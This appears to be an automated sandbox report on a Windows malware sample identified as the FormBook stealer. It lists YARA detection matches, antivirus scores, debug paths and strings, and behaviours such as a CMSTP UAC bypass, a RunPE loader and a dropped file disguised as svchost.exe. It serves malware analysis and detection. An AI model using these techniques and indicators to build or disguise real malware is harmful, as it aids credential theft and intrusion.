Source: Yara match; file source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe; Virustotal: Detection: 45%
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe; Metadefender: Detection: 22%
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe; ReversingLabs: Detection: 51%

Exploits:

                Yara detected UAC Bypass using CMSTP
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.38fe890.26.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.5120000.16.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.5120000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.39702c0.25.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.39702c0.9.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.394b5e7.24.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.394b5e7.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.39702c0.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.5120000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.5120000.31.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.39702c0.25.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.373b3c0.7.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.38fe890.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.373b3c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.38fe890.26.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.0.RYhdmjjr94.exe.373b3c0.23.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: RYhdmjjr94.exe PID: 4328, type: MEMORYSTR
                Source: RYhdmjjr94.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: RYhdmjjr94.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.265038309.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.580652189.00000000064DD000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp
                Source: Binary string: RYhdmjjr94.PDBnn source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: = a.pdb= source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: osymbols\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb* source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbote source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbtl@ source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbop\RYhd( source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: QC:\Users\user\Desktop\RYhdmjjr94.PDB source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbnt source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbM source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdbp source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb" source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: *lC:\Users\user\Desktop\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdb8 source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\Microsoft.PythonTools.IronPython.pdbpdbhon.pdb source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbAJ!B source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.PythonTools.IronPython.pdb| source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`Q source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: l`C:\Windows\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: aspnet_compiler.pdb source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmp, 36C95A71.exe, 00000018.00000000.310088788.0000000000BD7000.00000002.00020000.sdmp, 36C95A71.exe, 00000020.00000000.332330313.0000000000297000.00000002.00020000.sdmp, svchost.exe, 00000024.00000000.359855846.00000000003D7000.00000002.00020000.sdmp, svchost.exe, 00000028.00000000.381985569.0000000000717000.00000002.00020000.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbo source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: svchost.exe, 00000003.00000002.597686401.0000028F6969A000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: svchost.exe, 00000003.00000002.597686401.0000028F6969A000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoPub
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.sectigo.com0
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmp; String found in binary or memory: http://www.bingmapsportal.comsv
                Source: AdvancedRun.exe, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp; String found in binary or memory: http://www.nirsoft.net/
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp; String found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp; String found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp; String found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp; String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp; String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                Source: svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000010.00000002.332002756.00000188CA265000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp; String found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp; String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp; String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp; String found in binary or memory: https://sectigo.com/CPS0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: https://sectigo.com/CPS0C
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: https://sectigo.com/CPS0D
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000010.00000003.328602178.00000188CA245000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp; String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmp; String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

                E-Banking Fraud:

                Yara detected FormBook
                Source: Yara match; File source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match; File source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY
                Source: powershell.exe; Process created: 49

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                .NET source code contains very large array initializations
                Source: RYhdmjjr94.exe, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 36C95A71.exe.0.dr, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: svchost.exe.0.dr, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/EC49F72F.cs; Large array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: AdvancedRun.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: AdvancedRun.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\System32\svchost.exe; Section loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exe; Section loaded: cdpsgshims.dll
                Source: RYhdmjjr94.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
